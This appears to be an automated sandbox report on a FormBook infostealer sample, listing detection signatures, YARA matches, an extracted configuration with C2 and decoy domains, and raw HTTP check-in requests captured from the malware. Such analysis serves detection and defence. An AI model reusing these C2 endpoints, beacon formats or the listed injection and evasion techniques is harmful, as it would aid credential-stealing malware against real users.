Windows Analysis Report DN_467842234567.exe

Overview

General Information

Sample Name: DN_467842234567.exe
Analysis ID: 491743
MD5: c16013ea29f9dd1525dcb65c2184784e
SHA1: 5afd533f29573050734e428f9f8c9ba08c79546a
SHA256: df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
Tags: exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}
Multi AV Scanner detection for submitted file
Source: DN_467842234567.exe ReversingLabs: Detection: 64%
Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll ReversingLabs: Detection: 11%
Machine Learning detection for sample
Source: DN_467842234567.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.1.DN_467842234567.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.DN_467842234567.exe.e920000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.WWAHost.exe.3d57968.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.DN_467842234567.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.WWAHost.exe.a398b0.0.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Uses 32bit PE files
Source: DN_467842234567.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 4x nop then pop esi 1_2_00415815
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 4x nop then pop esi 1_2_00415818
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop esi 7_2_00575815
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop esi 7_2_00575818

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.kxdrstone.com
Source: C:\Windows\explorer.exe Domain query: www.financecreditpro.com
Source: C:\Windows\explorer.exe Domain query: www.2377k.com
Source: C:\Windows\explorer.exe Domain query: www.portale-accessi-anomali.com
Source: C:\Windows\explorer.exe Network Connect: 5.9.90.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.nurhalilah.xyz
Source: C:\Windows\explorer.exe Domain query: www.uscryptomininglaws.com
Source: C:\Windows\explorer.exe Domain query: www.healthcaresms.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.11.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.drive16pay.art
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lottochain.bet
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.98 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.smpldebts.com
Source: C:\Windows\explorer.exe Network Connect: 202.165.66.108 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.nurhalilah.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.bofight.store/r95e/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 19:07:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6957037758895c14-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color:
Source: DN_467842234567.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: DN_467842234567.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: unknown DNS traffic detected: queries for: www.kxdrstone.com
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1Host: www.nurhalilah.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1Host: www.uscryptomininglaws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1Host: www.financecreditpro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1Host: www.lottochain.betConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1Host: www.2377k.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1Host: www.drive16pay.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404FF1

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: DN_467842234567.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
